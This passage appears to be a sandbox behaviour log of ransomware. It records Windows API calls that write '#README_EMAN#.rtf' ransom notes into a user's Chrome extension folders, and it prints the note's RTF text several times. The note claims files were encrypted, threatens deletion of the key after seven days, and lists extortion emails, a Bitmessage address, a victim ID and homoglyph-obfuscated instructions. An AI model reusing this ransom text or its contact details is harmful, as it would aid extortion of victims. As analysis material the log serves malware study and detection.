t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7f\x03\x1d", lpUsedDefaultChar=0x0) returned 8717 [0292.190] WriteFile (in: hFile=0x2e8, lpBuffer=0x1ef8bd8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef8bd8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0292.191] CloseHandle (hObject=0x2e8) returned 1 [0292.191] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\#readme_eman#.rtf")) returned 0xffffffff [0292.191] GetLastError () returned 0x2 [0292.191] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e8 [0292.192] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0292.192] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0292.192] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef8bd8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 